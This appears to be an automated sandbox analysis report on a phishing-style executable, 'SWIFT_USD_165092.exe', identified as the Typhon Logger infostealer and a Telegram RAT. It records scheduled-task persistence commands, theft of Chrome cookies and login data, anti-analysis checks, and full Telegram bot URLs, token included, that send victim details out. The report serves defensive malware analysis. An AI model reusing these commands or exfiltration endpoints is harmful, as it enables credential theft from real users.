                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess created: C:\Users\user\AppData\Roaming\svchost\svchost.exe C:\Users\user\AppData\Roaming\svchost\svchost.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C mkdir "C:\Users\user\AppData\Roaming\svchostJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /fJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C copy "C:\Users\user\AppData\Roaming\svchost\svchost.exe" "C:\Users\user\AppData\Roaming\svchost\svchost.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023\Credit CardsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023\CookiesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023\AutofillsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\88560075-49ce-438f-ba24-9980eb388270Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023\AutofillsJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess created: C:\Users\user\AppData\Roaming\svchost\svchost.exe C:\Users\user\AppData\Roaming\svchost\svchost.exe
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C mkdir "C:\Users\user\AppData\Roaming\svchost
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C copy "C:\Users\user\AppData\Roaming\svchost\svchost.exe" "C:\Users\user\AppData\Roaming\svchost\svchost.exe
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeQueries volume information: C:\Users\user\Desktop\SWIFT_USD_165092.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeQueries volume information: C:\Users\user\Desktop\SWIFT_USD_165092.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost\svchost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost\svchost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost\svchost.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost\svchost.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                    Source: svchost.exe, 00000028.00000002.650586670.000000000329E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: procmon.exe
                    Source: svchost.exe, 00000028.00000002.650586670.000000000329E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tcpview.exe
                    Source: Amcache.hve.37.drBinary or memory string: msmpeng.exe
                    Source: svchost.exe, 00000028.00000002.650586670.000000000329E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: wireshark.exe
                    Source: Amcache.hve.37.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                    Source: svchost.exe, 00000028.00000002.650586670.000000000329E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: lordpe.exe
                    Source: SWIFT_USD_165092.exe, 00000001.00000003.481123989.0000000000B16000.00000004.00000020.00020000.00000000.sdmp, SWIFT_USD_165092.exe, 00000001.00000003.480236293.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.588963258.0000000005509000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: svchost.exe, 00000028.00000002.650586670.000000000329E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: autoruns.exe
                    Source: svchost.exe, 00000028.00000002.650586670.000000000329E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ollydbg.exe
                    Source: svchost.exe, 00000028.00000002.650586670.000000000329E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: regmon.exe

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 0000000E.00000002.651681057.0000000002EF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.524320725.00000000028A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SWIFT_USD_165092.exe PID: 5640, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5484, type: MEMORYSTR
                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                    Yara detected Typhon Logger
                    Source: Yara matchFile source: 0.2.SWIFT_USD_165092.exe.4068d70.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SWIFT_USD_165092.exe.3e61140.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.SWIFT_USD_165092.exe.720000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SWIFT_USD_165092.exe.3e61140.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000E.00000002.651681057.0000000002EF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.524320725.00000000028A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.519129931.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.399919891.0000000003C59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SWIFT_USD_165092.exe PID: 5640, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5484, type: MEMORYSTR
                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: Yara matchFile source: Process Memory Space: SWIFT_USD_165092.exe PID: 5640, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5484, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 0000000E.00000002.651681057.0000000002EF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.524320725.00000000028A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SWIFT_USD_165092.exe PID: 5640, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5484, type: MEMORYSTR
                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                    Yara detected Typhon Logger
                    Source: Yara matchFile source: 0.2.SWIFT_USD_165092.exe.4068d70.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SWIFT_USD_165092.exe.3e61140.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.SWIFT_USD_165092.exe.720000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SWIFT_USD_165092.exe.3e61140.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000E.00000002.651681057.0000000002EF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.524320725.00000000028A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.519129931.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.399919891.0000000003C59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SWIFT_USD_165092.exe PID: 5640, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5484, type: MEMORYSTR
                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    1
                    Valid Accounts                    		131
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		1
                    Disable or Modify Tools                    		1
                    OS Credential Dumping                    		1
                    File and Directory Discovery                    		Remote Services1
                    Archive Collected Data                    		Exfiltration Over Other Network Medium1
                    Web Service                    		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default Accounts1
                    Native API                    		1
                    Valid Accounts                    		1
                    Valid Accounts                    		11
                    Obfuscated Files or Information                    		211
                    Input Capture                    		34
                    System Information Discovery                    		Remote Desktop Protocol1
                    Data from Local System                    		Exfiltration Over Bluetooth1
                    Ingress Tool Transfer                    		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain Accounts1
                    Scheduled Task/Job                    		1
                    Scheduled Task/Job                    		1
                    Access Token Manipulation                    		1
                    DLL Side-Loading                    		Security Account Manager1
                    Query Registry                    		SMB/Windows Admin Shares211
                    Input Capture                    		Automated Exfiltration11
                    Encrypted Channel                    		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)211
                    Process Injection                    		11
                    Masquerading                    		NTDS351
                    Security Software Discovery                    		Distributed Component Object ModelInput CaptureScheduled Transfer3
                    Non-Application Layer Protocol                    		SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon Script1
                    Scheduled Task/Job                    		1
                    Valid Accounts                    		LSA Secrets2
                    Process Discovery                    		SSHKeyloggingData Transfer Size Limits14
                    Application Layer Protocol                    		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.common1
                    Access Token Manipulation                    		Cached Domain Credentials151
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup Items151
                    Virtualization/Sandbox Evasion                    		DCSync1
                    Application Window Discovery                    		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job211
                    Process Injection                    		Proc Filesystem1
                    Remote System Discovery                    		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
                    System Network Configuration Discovery                    		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 872897 Sample: SWIFT_USD_165092.exe Startdate: 22/05/2023 Architecture: WINDOWS Score: 100 91 Found malware configuration 2->91 93 Malicious sample detected (through community Yara rule) 2->93 95 Multi AV Scanner detection for submitted file 2->95 97 12 other signatures 2->97 8 svchost.exe 1 2->8         started        11 SWIFT_USD_165092.exe 2 2->11         started        14 svchost.exe 2->14         started        16 msiexec.exe 2->16         started        process3 file4 107 System process connects to network (likely due to code injection or exploit) 8->107 109 Multi AV Scanner detection for dropped file 8->109 111 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->111 117 2 other signatures 8->117 18 svchost.exe 14 29 8->18         started        22 cmd.exe 8->22         started        35 2 other processes 8->35 79 C:\Users\user\...\SWIFT_USD_165092.exe.log, ASCII 11->79 dropped 113 May check the online IP address of the machine 11->113 115 Injects a PE file into a foreign processes 11->115 24 cmd.exe 2 11->24         started        26 cmd.exe 3 11->26         started        29 SWIFT_USD_165092.exe 15 36 11->29         started        31 cmd.exe 1 11->31         started        33 svchost.exe 14->33         started        37 3 other processes 14->37 signatures5 process6 dnsIp7 81 api.ipify.org 18->81 83 245.246.1.0.in-addr.arpa 18->83 99 System process connects to network (likely due to code injection or exploit) 18->99 101 Tries to harvest and steal browser information (history, passwords, etc) 18->101 45 6 other processes 18->45 47 2 other processes 22->47 103 Uses schtasks.exe or at.exe to add and modify task schedules 24->103 105 Drops PE files with benign system names 24->105 39 conhost.exe 24->39         started        75 C:\Users\user\AppData\Roaming\...\svchost.exe, PE32 26->75 dropped 77 C:\Users\user\...\svchost.exe:Zone.Identifier, ASCII 26->77 dropped 41 conhost.exe 26->41         started        85 api4.ipify.org 173.231.16.76, 49715, 49724, 80 WEBNXUS United States 29->85 87 api.telegram.org 149.154.167.220, 443, 49718, 49719 TELEGRAMRU United Kingdom 29->87 89 4 other IPs or domains 29->89 49 7 other processes 29->49 51 2 other processes 31->51 43 tasklist.exe 33->43         started        53 2 other processes 35->53 55 4 other processes 37->55 file8 signatures9 process10 process11 57 conhost.exe 43->57         started        59 conhost.exe 45->59         started        61 conhost.exe 45->61         started        63 conhost.exe 45->63         started        71 3 other processes 45->71 65 conhost.exe 49->65         started        67 conhost.exe 49->67         started        69 conhost.exe 49->69         started        73 3 other processes 49->73

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    SWIFT_USD_165092.exe32%ReversingLabsWin32.Trojan.Woreflint
                    SWIFT_USD_165092.exe35%VirustotalBrowse
                    SWIFT_USD_165092.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\svchost\svchost.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\svchost\svchost.exe32%ReversingLabsWin32.Trojan.Woreflint

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://api.telegram.org4Dp0%URL Reputationsafe
                    https://java.sun.com0%URL Reputationsafe
                    https://api.telegram0%URL Reputationsafe
                    https://api.telegram.org4Dp(0%Avira URL Cloudsafe
                    http://api.ipify.orgD8Dp0%Avira URL Cloudsafe
                    http://api.ipify.org4Dp0%Avira URL Cloudsafe
                    https://subf.domfagdfa6ffaffiffn.comd/objecsts.json?api_key=123R0%Avira URL Cloudsafe
                    https://ipapi.co4Dp0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    ipapi.co
                    		172.67.69.226
                    		truefalse
                      		high
                      api4.ipify.org
                      		173.231.16.76
                      		truefalse
                        		high
                        api.telegram.org
                        		149.154.167.220
                        		truefalse
                          		high
                          245.246.1.0.in-addr.arpa
                          		unknown
                          		unknownfalse
                            		high
                            api.ipify.org
                            		unknown
                            		unknownfalse
                              		high

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              https://api.telegram.org/bot5869127049:AAE4vUitXNuHH_zpHPpNqKI8kJlNJ2I0Hss/sendMessage?chat_id=1689002171&text=New%20TyphonLogger%20log!%0A---------------------%0AUsername:%20user%0AMachine%20name:%20128757%0AHWID:%201B269386E0%0AIP%20address:%2084.17.52.45%0A---------------------%0ABuild%20Tag:%20%0A---------------------%0AYour%20logs%20are%20in%20the%20ZIP%20file%20being%20uploaded.%0AThank%20you%20for%20using%20TyphonLogger!%0Ahttps://t.me/typhon_shopfalse
                                		high
                                https://ipapi.co/84.17.52.45/jsonfalse
                                  		high
                                  https://api.telegram.org/bot5869127049:AAE4vUitXNuHH_zpHPpNqKI8kJlNJ2I0Hss/sendDocument?chat_id=1689002171false
                                    		high
                                    http://api.ipify.org/false
                                      		high
                                      https://api.telegram.org/bot5869127049:AAE4vUitXNuHH_zpHPpNqKI8kJlNJ2I0Hss/sendMessage?chat_id=1689002171false
                                        		high

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://duckduckgo.com/chrome_newtabSWIFT_USD_165092.exe, 00000001.00000003.481034503.000000000624E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.589310813.00000000055C8000.00000004.00000020.00020000.00000000.sdmp, 2956d154-79a0-458c-9507-f5de6e62dd96.1.dr, acf092cf-e9ca-4ee8-8b91-35872d9c173c.14.dr, b65d24f6-721c-4e3e-aed6-0778bb2b440a.14.dr, b7fbbbd0-cab3-4baf-a44e-1add614b7f64.1.drfalse
                                          		high
                                          https://duckduckgo.com/ac/?q=b7fbbbd0-cab3-4baf-a44e-1add614b7f64.1.drfalse
                                            		high
                                            https://t.me/typhon_shopD8DpSWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002DDC000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.000000000335A000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://api.telegram.orgSWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002DDC000.00000004.00000800.00020000.00000000.sdmp, SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002DD8000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.000000000335A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000003356000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icoSWIFT_USD_165092.exe, 00000001.00000003.481034503.000000000624E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.589310813.00000000055C8000.00000004.00000020.00020000.00000000.sdmp, 2956d154-79a0-458c-9507-f5de6e62dd96.1.dr, acf092cf-e9ca-4ee8-8b91-35872d9c173c.14.dr, b65d24f6-721c-4e3e-aed6-0778bb2b440a.14.dr, b7fbbbd0-cab3-4baf-a44e-1add614b7f64.1.drfalse
                                                  		high
                                                  https://api.telegram.org/botSWIFT_USD_165092.exe, 00000001.00000002.524320725.00000000028A9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000002EF9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.000000000311D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://api.ipify.org4DpSWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002841000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000002E91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://search.yahoo.com?fr=crmas_sfpfSWIFT_USD_165092.exe, 00000001.00000003.481034503.000000000624E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.589310813.00000000055C8000.00000004.00000020.00020000.00000000.sdmp, 2956d154-79a0-458c-9507-f5de6e62dd96.1.dr, acf092cf-e9ca-4ee8-8b91-35872d9c173c.14.dr, b65d24f6-721c-4e3e-aed6-0778bb2b440a.14.dr, b7fbbbd0-cab3-4baf-a44e-1add614b7f64.1.drfalse
                                                      		high
                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=b7fbbbd0-cab3-4baf-a44e-1add614b7f64.1.drfalse
                                                        		high
                                                        http://upx.sf.netAmcache.hve.37.drfalse
                                                          		high
                                                          https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchSWIFT_USD_165092.exe, 00000001.00000003.481034503.000000000624E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.589310813.00000000055C8000.00000004.00000020.00020000.00000000.sdmp, 2956d154-79a0-458c-9507-f5de6e62dd96.1.dr, acf092cf-e9ca-4ee8-8b91-35872d9c173c.14.dr, b65d24f6-721c-4e3e-aed6-0778bb2b440a.14.dr, b7fbbbd0-cab3-4baf-a44e-1add614b7f64.1.drfalse
                                                            		high
